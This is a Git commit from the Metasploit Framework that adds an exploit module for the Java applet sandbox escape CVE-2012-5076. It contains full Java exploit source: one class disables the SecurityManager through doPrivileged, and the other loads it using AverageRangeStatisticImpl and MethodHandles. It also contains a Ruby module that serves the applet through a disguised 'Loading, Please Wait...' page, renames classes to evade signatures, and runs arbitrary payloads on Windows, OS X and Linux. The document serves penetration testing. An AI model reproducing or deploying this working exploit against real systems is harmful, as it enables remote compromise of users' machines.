Added new module for cve-2012-5076

bug/bundler_fix
jvazquez-r7 2013-01-17 21:27:47 +01:00
parent 624ef9a329
commit 78279a0397
6 changed files with 247 additions and 0 deletions

Binary file not shown.

Binary file not shown.

View File

@ -0,0 +1,19 @@
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;
public class B
implements PrivilegedExceptionAction
{
public B()
{
try
{
AccessController.doPrivileged(this); } catch (Exception e) {
}
}
public Object run() {
System.setSecurityManager(null);
return new Object();
}
}

View File

@ -0,0 +1,78 @@
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import metasploit.Payload;
//import java.lang.Runtime;
import java.applet.Applet;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.lang.reflect.Method;
import com.sun.org.glassfish.external.statistics.impl.*;
public class Exploit extends Applet
{
public static MethodHandles.Lookup test0;
public Exploit()
{
}
public void init()
{
try
{
ByteArrayOutputStream bos = new ByteArrayOutputStream();
byte[] buffer = new byte[8192];
int length;
// read in the class file from the jar
InputStream is = getClass().getResourceAsStream("B.class");
// and write it out to the byte array stream
while( ( length = is.read( buffer ) ) > 0 )
bos.write( buffer, 0, length );
// convert it to a simple byte array
buffer = bos.toByteArray();
Class c = Class.forName("java.lang.invoke.MethodHandles");
Method m = c.getMethod("lookup", new Class[0]);
AverageRangeStatisticImpl Avrg = new AverageRangeStatisticImpl(0,0,0,"","","",0,0);
MethodHandles.Lookup test = (MethodHandles.Lookup)Avrg.invoke(null, m, new Object[0]);
MethodType localMethodType0 = MethodType.methodType(Class.class, String.class);
MethodHandle localMethodHandle0 = test.findStatic(Class.class, "forName", localMethodType0);
Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" });
Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" });
// Instance of sun.org.mozilla.javascript.internal.Context
MethodType localMethodType1 = MethodType.methodType(Void.TYPE);
MethodHandle localMethodHandle1 = test.findConstructor(localClass1, localMethodType1);
Object localObject1 = localMethodHandle1.invokeWithArguments(new Object[0]);
// Context.createClassLoader
MethodType localMethodType2 = MethodType.methodType(localClass2, ClassLoader.class);
MethodHandle localMethodHandle2 = test.findVirtual(localClass1, "createClassLoader", localMethodType2);
Object localObject2 = localMethodHandle2.invokeWithArguments(new Object[] { localObject1, null });
// GeneratedClassLoader.defineClass
MethodType localMethodType3 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
MethodHandle localMethodHandle3 = test.findVirtual(localClass2, "defineClass", localMethodType3);
Class localClass3 = (Class)localMethodHandle3.invokeWithArguments(new Object[] { localObject2, null, buffer });
//New instance of the helper Class
localClass3.newInstance();
Payload.main(null);
//Runtime.getRuntime().exec("calc.exe");
}
catch(Throwable ex)
{
//ex.printStackTrace();
}
}
}

View File

@ -0,0 +1,18 @@
# rt.jar must be in the classpath!
CLASSES = \
Exploit.java \
B.java
.SUFFIXES: .java .class
.java.class:
javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java
all: $(CLASSES:.java=.class)
install:
mv Exploit.class ../../../../data/exploits/cve-2013-0422/
mv B.class ../../../../data/exploits/cve-2013-0422/
clean:
rm -rf *.class

View File

@ -0,0 +1,132 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
def initialize( info = {} )
super( update_info( info,
'Name' => 'Java Applet JMX Remote Code Execution',
'Description' => %q{
This module abuses the AverageRangeStatisticImpl from a Java Applet to run
arbitrary Java code outside of the sandbox, a different exploit vector than the one
exploited in the wild in November of 2012. The vulnerability affects Java version
7u7 and earlier.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovery at security-explorations
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2012-5076' ],
[ 'OSVDB', '86363' ],
[ 'BID', '56054' ],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ],
[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-5076' ],
[ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ]
],
'Platform' => [ 'java', 'win', 'osx', 'linux' ],
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)',
{
'Platform' => ['java'],
'Arch' => ARCH_JAVA,
}
],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
}
],
[ 'Mac OS X x86 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
],
[ 'Linux x86 (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 16 2012'
))
end
def setup
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5076_2", "Exploit.class")
@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5076_2", "B.class")
@loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
@exploit_class_name = rand_text_alpha("Exploit".length)
@exploit_class.gsub!("Exploit", @exploit_class_name)
super
end
def on_request_uri(cli, request)
print_status("handling request for #{request.uri}")
case request.uri
when /\.jar$/i
jar = payload.encoded_jar
jar.add_file("#{@exploit_class_name}.class", @exploit_class)
jar.add_file("B.class", @loader_class)
metasploit_str = rand_text_alpha("metasploit".length)
payload_str = rand_text_alpha("payload".length)
jar.entries.each { |entry|
entry.name.gsub!("metasploit", metasploit_str)
entry.name.gsub!("Payload", payload_str)
entry.data = entry.data.gsub("metasploit", metasploit_str)
entry.data = entry.data.gsub("Payload", payload_str)
}
jar.build_manifest
send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
when /\/$/
payload = regenerate_payload(cli)
if not payload
print_error("Failed to generate the payload.")
send_not_found(cli)
return
end
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
else
send_redirect(cli, get_resource() + '/', '')
end
end
def generate_html
html = %Q|<html><head><title>Loading, Please Wait...</title></head>|
html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
html += %Q|</applet></body></html>|
return html
end
end